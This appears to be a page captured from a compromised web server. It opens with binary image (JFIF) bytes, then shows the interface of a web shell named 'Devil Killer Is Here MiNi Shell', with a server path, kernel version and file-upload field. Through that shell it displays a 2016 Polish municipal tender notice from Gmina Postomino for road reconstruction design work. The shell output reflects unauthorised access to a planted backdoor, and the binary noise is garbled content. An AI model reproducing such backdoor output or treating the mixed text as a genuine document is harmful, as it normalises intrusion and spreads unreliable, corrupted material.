JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161104/336482-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.postomino.bip.net.pl' target='_blank'>www.postomino.bip.net.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 336482 - 2016
              z dnia 2016-11-04 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Postomino: Wykonanie wielobranżowych projektów budowlano-wykonawczych wraz z wykonaniem map do celów projektowych oraz badaniami gruntu<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Postomino, krajowy numer identyfikacyjny
              77097989000000, ul.
              Postomino 
              30,
              76113  
              Postomino, woj.
              zachodniopomorskie, państwo
              Polska, tel.
              0-59 810 85 93, e-mail
              , faks
              0-59 810 85 84.
              <br />
              Adres strony internetowej (URL): www.postomino.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.postomino.bip.net.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Składanie oferty odbywa się w formie pisemnej za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r.  - Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca  <br />
                Adres:
                <br />Urząd Gminy Postomino, Postomino 30, 76-113 Postomino</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie wielobranżowych projektów budowlano-wykonawczych wraz z wykonaniem map do celów projektowych oraz badaniami gruntu<br /><b>Numer referencyjny: </b>ZP.271.22.016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>3.1.Przedmiotem zamówienia jest  wykonanie wielobranżowych projektów budowlano-wykonawczych wraz z wykonaniem map do celów projektowych oraz badaniami gruntu dla n/w zadań, które stanowią następujące części: 
3.1.1.	CZĘŚĆ I: Przebudowa drogi gminnej wraz ze zjazdami oraz budową oświetlenia drogowego do wielorodzinnego budynku mieszkalnego (etap I) i do fermy drobiu (etap II) na dz. nr 123 i 192 obręb Staniewice,
3.1.2.	CZĘŚĆ II: Przebudowa drogi gminnej wraz ze zjazdami oraz budową oświetlenia drogowego ciągu pieszego w m. Pałowo realizowaną w II etapach na dz. nr 93 i 118 obręb Pałowo,
3.1.3.	CZĘŚĆ III: Przebudowa drogi gminnej wraz ze zjazdami oraz budową oświetlenia drogowego realizowanego w III etapach na dz. nr 237, 222, 214, 210/21 obręb Pieszcz,
3.1.4.	CZĘŚĆ IV: Przebudowa drogi gminnej wraz ze zjazdami na dz. nr 366/34 obręb Postomino,
3.1.5.	CZĘŚĆ V: Przebudowa drogi gminnej  ul. Korsarzy i odcinka ul. Żeglarzy wraz ze zjazdami i oświetleniem drogowym oraz odwodnieniem na dz. nr 69/154 69/127 obręb Rusinowo,
3.1.6.	CZĘŚĆ VI: Przebudowa odcinka drogi powiatowej wraz z budową chodnika, zejść na plażę i oświetlenia na odcinku od skrzyżowania ul. Bałtyckiej z ulicą Leśną w obrębie Jarosławiec do skrzyżowania z ul. Letniskową obręb Rusinowo.
3.2.Zakres prac objętych zamówieniem:
3.2.1.CZĘŚĆ I - przebudowa istniejącej drogi z płyt drogowych betonowych i częściowo z kruszywa łamanego wraz z mijankami z płyt drogowych betonowych na drogę o nawierzchni z betonu asfaltowego wraz z oświetleniem w m. Staniewice.
Etap I obejmuje przebudowę odcinka drogi z płyt drogowych i częściowo 
z kruszywa łamanego o łącznej długości ca. 670,00 mb na drogę o nawierzchni 
z betonu asfaltowego wraz ze zjazdami do gruntów rolnych oraz oświetleniem 
z oprawami typu LED. Klasa projektowanej drogi  D. Odcinek projektowanej drogi od dr. powiatowej do budynku wielorodzinnego.
Etap II obejmuje przebudowę odcinka drogi z płyt drogowych betonowych na odcinku ca. 230,0 mb na drogę o nawierzchni z betonu asfaltowego wraz ze zjazdami i oświetleniem z oprawami typu LED. Klasa projektowanej drogi  D. Odcinek projektowanej drogi  od budynku wielorodzinnego do wjazdu na fermę drobiu.
3.2.2.	CZĘŚĆ II - przebudowa drogi gminnej z kostki kamiennej kocie łby na drogę o nawierzchni z kostki granitowej rzędowej i betonu asfaltowego wraz z oświetleniem w m. Pałowo
Etap I  obejmuje przebudowę odcinka istniejącej drogi o nawierzchni z kostki kamiennej kocie łby o łącznej długości ca. 400,0 mb i szerokości ca 3,5 m na drogę o nawierzchni z kostki granitowej 17/15 cm wraz ze zjazdami i dojściami do furtek, z ciągiem pieszym z kostki brukowej betonowej i oświetleniem z oprawami typu LED. Odwodnienie pasa drogowego do istniejącego rowu przydrożnego wraz z przebudową przepustów. Klasa projektowanej drogi  D. Etap II  obejmuje przebudowę istniejącej drogi o nawierzchni z kostki kamiennej kocie łby o łącznej długości ca. 470,0 mb i szerokości ca 3,5 m na drogę o nawierzchni z betonu asfaltowego wraz ze zjazdami i dojściami do furtek, z ciągiem pieszym i oświetleniem z oprawami typu LED do ostatnich zabudowań w m. Pałowo. Odwodnienie pasa drogowego do istniejącego rowu przydrożnego wraz z przebudową przepustów. Klasa projektowanej drogi  D.
3.2.3.	CZĘŚĆ III  przebudowa odcinka istniejącej drogi gminnej częściowo gruntowej utwardzonej kruszywem, a częściowo z płyt betonowych na drogę o nawierzchni z betonu asfaltowego wraz ze zjazdami i oświetleniem z oprawami typu LED w m. Pieszcz. 
Etap I  obejmuje przebudowę odcinka istniejącej drogi gminnej gruntowej utwardzonej kruszywem o długości ca 270 m na drogę o nawierzchni z betonu asfaltowego szerokości 5 m  wraz ze zjazdami i oświetleniem z oprawami typu LED. Klasa projektowanej drogi  D. Odcinek projektowanej drogi od dr. powiatowej koło cmentarza w kierunku Orlika.
Etap II  obejmuje przebudowę odcinka istniejącej drogi gminnej z płyt betonowych o łącznej długości ca 800 mb i szerokości ca 4,5 m na drogę o nawierzchni z betonu asfaltowego wraz ze zjazdami i oświetleniem z oprawami typu LED. Klasa projektowanej drogi  D. Odcinek projektowanej drogi od Orlika w kierunku fermy drobiu.
Uwaga! Gmina posiada dokumentację projektową na przebudowę odcinka drogi gminnej od dr. powiatowej koło szkoły do Orlika nie objętej zakresem opracowania dokumentacji projektowej. 
W związku z powyższym opracowania projektowe należy opracować w taki sposób, aby każdy z etapów po realizacji całości zadania stanowiły spójną całość.
3.2.4.	CZĘŚĆ IV - przebudowa drogi gminnej o nawierzchni gruntowej utwardzonej kruszywem o łącznej długości ca. 240 m na drogę o nawierzchni z betonu asfaltowego wraz ze zjazdami na dz. nr 366/34 obręb Postomino. Klasa projektowanej drogi  D.
3.2.5.	CZĘŚĆ V  przebudowa drogi gminnej  ul. Korsarzy, odcinka ul. Żeglarzy i odcinka ul. Na Wzgórzu o nawierzchni gruntowej utwardzonej kruszywem na drogę o nawierzchni z kostki brukowej betonowej  jako ciąg pieszo-jezdny wraz ze zjazdami i oświetleniem drogowym z oprawami typu LED oraz odwodnieniem na dz. nr 69/154 69/127 obręb Rusinowo. Odwodnienie drogi poprzez kolektor kanalizacji deszczowej do istniejącego rowu przy drodze powiatowej. Z uwagi na wysoki poziom wód gruntowych należy również zaprojektować drenaż odprowadzający wody gruntowe podskórne do projektowanej kanalizacji deszczowej. W związku z projektowanym odprowadzeniem wód opadowych do rowu konieczne jest opracowanie operatu wodnoprawnego i uzyskanie pozwolenia wodnoprawnego.
3.2.6.	CZĘŚĆ VI  przebudowa odcinka drogi powiatowej wraz z budową chodnika, zejść na plażę i oświetlenia na odcinku od skrzyżowania ul. Bałtyckiej z ulicą Leśną w obrębie Jarosławiec do skrzyżowania z ul. Letniskową obręb Rusinowo. Istniejąca droga 
o nawierzchni betonowej i częściowo o nawierzchni betonowej z nakładką z betonu asfaltowego o łącznej długości ca 1900 mb i szerokościca 6  11 m z odcinkiem chodnika z kostki brukowej betonowej o łącznej długości ca 150 m na drogę o nawierzchni z betonu asfaltowego wraz ze zjazdami do gruntów leśnych i na zejścia na plażę, z chodnikiem z kostki brukowej betonowej i oświetleniem drogowym z oprawami typu LED oraz miejscami postojowymi wzdłuż projektowanej drogi na odcinku ca 520 mb. Aktualnie na przedmiotowym odcinku drogi trwają prace projektowe prowadzone przez ZZDW w Koszalinie polegające na zaprojektowaniu ścieżki rowerowej od miejscowości Wicie w gm. Darłowo do m. Jarosławiec gm. Postomino. W związku z powyższym projekt przebudowy drogi wraz z budową chodnika i oświetlenia należy zaprojektować i uzgodnić również z ZZDW w celu uniknięcia kolizji jak również zachowania spójności projektów. Gmina posiada mapę do celów projektowych dla tego odcinka jednak jest ona już nieaktualna i należy wykonać aktualizację.
3.3.Wykonawca wykona projekty wstępnie uzgodnione na etapie koncepcji z Zamawiającym i zarządcami istniejącego uzbrojenia kolidującego z inwestycją oraz uzyska pozytywną opinię Narady Koordynacyjnej przy Starostwie Powiatowym w Sławnie zgodnie z umową, obowiązującymi przepisami oraz normami. Wykonawca dostarczy dokumentację projektową w stanie kompletnym z punktu widzenia celu, któremu ma służyć.
3.4.Dokumentację projektową dla w/w części Wykonawca zobowiązuje się dostarczyć w wersji elektronicznej, pliki w formacie PDF oraz kosztorysy w wersji edytowalnej (rds lub ath) oraz w formie papierowej w ilości:
3.4.1.projekt zagospodarowania terenu wraz z projektem  budowlano-wykonawczym dla każdej branży po 5 egz.,
3.4.2.przedmiary robót  po 2 egz,
3.4.3.kosztorysy inwestorskie - po 2 egz.,
3.4.4.uzgodniony projekt stałej organizacji ruchu  po 4 egz.,
3.4.5.specyfikacje techniczne wykonania i odbioru robót dla każdej branży po 2 egz. wraz z pisemnym oświadczeniem o jej kompletności .
3.5.Uwaga. Cała dokumentacja projektowo-kosztorysowa nie może zawierać nazw handlowych, znaków towarowych wraz z nazwami firm. Dokumentacja projektowa winna być wykonana bez wskazywania znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę  chyba że, jest to uzasadnione specyfiką przedmiotu zamówienia i nie można opisać przedmiotu zamówienia za pomocą dokładnych określeń - wtedy wskazaniu takiemu towarzyszą wyrazy lub równoważny, a w związku z tym muszą być sprecyzowane parametry, po spełnieniu których produkt zostanie uznany za równoważny. 
3.6.Projekty i kosztorysy z przedmiarami robót należy sporządzić zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego  ogłoszonego w Obwieszczeniu Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 10 maja 2013 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Ministra Infrastruktury i powinny zawierać między innymi: kartę tytułową, krótką charakterystykę (opis) przedsięwzięcia, kosztorys szczegółowy i kosztorys uproszczony.
3.7.Gmina zobowiązuje się dostarczyć wypis i wyrys z miejscowego planu zagospodarowania przestrzennego dla terenów dla których opracowany jest mpzp.
3.8.Wykonawca wystąpi z wnioskiem o:
3.8.1.decyzję o ustalenie lokalizacji inwestycji celu publicznego dla terenów nie posiadających planów miejscowych - po określeniu przez Wykonawcę planowanego sposobu zagospodarowania terenu oraz charakterystyki zabudowy 
i zagospodarowania terenu, przedstawione w formie graficznej wraz z określeniem granic terenu objętego wnioskiem, przedstawionych na 2 egzemplarzach kopii mapy zasadniczej,
3.8.2.decyzję o środowiskowych uwarunkowaniach po dostarczeniu przez Wykonawcę - karty informacyjnej przedsięwzięcia (z mapą ewidencyjną z zaznaczeniem obszaru oddziaływania oraz inwentaryzacją biologiczną) zawierająca podstawowe informacje o planowanym przedsięwzięciu zgodnie z wymogami zawartymi w art. 3 ust.1 pkt 5 ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2016 r., poz. 353 j.t.)  niezbędnych do wydania decyzji o środowiskowych uwarunkowaniach również w wersji elektronicznej. Wykaz przedsięwzięć mogących potencjalnie znacząco oddziaływać na środowisko zawiera Rozporządzenie Rady Ministrów z dnia 9 listopada 2010 r.  Dz.U. z 2016 r., poz.71. W przypadku nałożenia obowiązku sporządzenia raportu oddziaływania przedsięwzięcia na środowisko Wykonawca jest zobowiązany do sporządzenia w/w raportu.
3.8.3.Wydanie decyzji pozwolenia wodnoprawnego dla zadań które będą tego wymagały.
3.9.Termin wykonania prac projektowych obejmuje badania gruntów 
z mapami do celów projektowych oraz z niezbędnymi uzgodnieniami w celu uzyskania decyzji pozwolenia na budowę lub zgłoszenia w Starostwie Powiatowym w Sławnie. 
3.10.Kod CPV Wspólnego Słownika Zamówień: 71320000-7.
3.11.Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp o łącznej wartości do 50 % zamówienia podstawowego. Warunki udzielenia zamówienia polegające na powtórzeniu podobnych usług nie mogą być gorsze niż zawarte w umowie podstawowej. 
3.12.Zamawiający dopuszcza złożenie ofert częściowych. 
3.13.Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę, na podstawie umowy o pracę zgodnie z art. 22 § 1 ustawy z dnia 26 czerwca 1976 r. - Kodeks pracy, co najmniej jednej osoby wykonującej prace projektowe objęte przedmiotem umowy przez cały okres realizacji zamówienia.
3.13.1.	Przed przystąpieniem do realizacji zamówienia Wykonawca zobowiązany jest do przedłożenia Zamawiającemu oświadczenia, w którym potwierdzi, że zatrudnił na podstawie umowy o pracę co najmniej 1 osobę wykonującą czynności, o których mowa w pkt 3.13.
3.13.2.	W przypadku konieczności zmiany - w okresie trwania umowy z Wykonawcą - osoby zatrudnionej na umowę o pracę wykonującej wskazane czynności,  wykonawca zobowiązany jest do przekazania zamawiającemu oświadczenia dotyczącego zatrudnienia nowej osoby.
3.13.3.	Zamawiający zastrzega sobie prawo do weryfikacji wiarygodności złożonego oświadczenia, wówczas Wykonawca zobowiązany jest do  przedłożenia dodatkowych dokumentów.
<br /><br /><b>II.5) Główny kod CPV: </b>71320000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                3.11.	Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp o łącznej wartości do 50 % zamówienia podstawowego. Warunki udzielenia zamówienia polegające na powtórzeniu podobnych usług nie mogą być gorsze niż zawarte w umowie podstawowej. <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 6<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
 	
6.3.1.1. CZĘŚĆ I: Przebudowa drogi gminnej wraz ze zjazdami oraz budową oświetlenia  drogowego do wielorodzinnego budynku mieszkalnego (etap I) i do fermy drobiu (etap II) na dz. nr 123 i 192 obręb Staniewice 
dwie usługi polegające na wykonaniu projektu budowlano-wykonawczego na przebudowę lub budowę drogi wraz z oświetleniem

6.3.1.2. CZĘŚĆ II: Przebudowa drogi gminnej wraz ze zjazdami oraz budową oświetlenia drogowego i ciągu pieszego w m. Pałowo realizowaną w II etapach na dz. nr 93 i 118 obręb Pałowo 
dwie usługi polegające na wykonaniu projektu budowlano-wykonawczego na przebudowę lub budowę drogi wraz z oświetleniem

6.3.1.3. CZĘŚĆ III: Przebudowa drogi gminnej wraz ze zjazdami oraz budową oświetlenia drogowego realizowanego w III etapach na dz. nr 237, 222, 214, 210/21 obręb Pieszcz 
dwie usługi polegające na wykonaniu projektu budowlano-wykonawczego na przebudowę lub budowę drogi wraz z oświetleniem

6.3.1.4.  CZĘŚĆ IV: Przebudowa drogi gminnej wraz ze zjazdami na dz. nr 366/34 obręb Postomino 
dwie usługi polegające na wykonaniu projektu budowlano-wykonawczego na przebudowę lub budowę drogi 
	
6.3.1.5.  CZĘŚĆ V: Przebudowa drogi gminnej  ul. Korsarzy i odcinka ul. Żeglarzy wraz ze zjazdami i oświetleniem drogowym oraz odwodnieniem na dz. nr 69/154 69/127 obręb Rusinowo 
dwie usługi polegające na wykonaniu projektu budowlano-wykonawczego na przebudowę lub budowę drogi z odwodnieniem 
oraz oświetleniem

6.3.1.6.   CZĘŚĆ VI: Przebudowa odcinka drogi powiatowej wraz z budową chodnika, zejść na plażę i oświetlenia na odcinku od skrzyżowania ul. Bałtyckiej z ulicą Leśną w obrębie Jarosławiec do skrzyżowania z ul. Letniskową obręb Rusinowo 
dwie usługi polegające na wykonaniu projektu budowlano-wykonawczego na przebudowę lub budowę drogi wraz z oświetleniem

z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
